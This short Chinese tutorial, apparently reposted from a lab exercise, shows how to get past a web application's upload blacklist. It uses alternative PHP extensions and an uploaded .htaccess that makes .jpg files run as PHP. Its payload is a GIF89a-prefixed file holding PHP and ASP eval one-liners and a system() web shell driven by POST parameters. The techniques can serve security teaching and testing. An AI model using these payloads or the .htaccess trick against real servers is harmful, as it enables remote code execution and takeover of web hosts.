這篇文章主要介紹了關於文件上傳繞過黑名單的方法,有著一定的參考價值,現在分享給大家,有需要的朋友可以參考一下
本關主要透過設定上傳後綴,限制asp,php,jsp 等後綴,不允許上傳。
姿勢一:本次繞過方式為修改後綴為.php3,php5等,這裡是黑名單驗證('.asp','.aspx','.php','.jsp') ,我們可上傳php3,php5...等這樣可以被伺服器解析的後綴名稱
#姿勢二:重寫檔案解析規則繞過
# 1.先上傳先上傳一個名為.htaccess文件,內容如下:
# SetHandler application/x-httpd-php
2、上傳1.jpg腳本
內容:
GIF89a
<?php eval($_POST['joker']);?>
<%eval request("joker")%>
<?php system($_POST['cmd']);?><span style="margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
以上是文件上傳繞過黑名單的方法的詳細內容。更多資訊請關注PHP中文網其他相關文章!
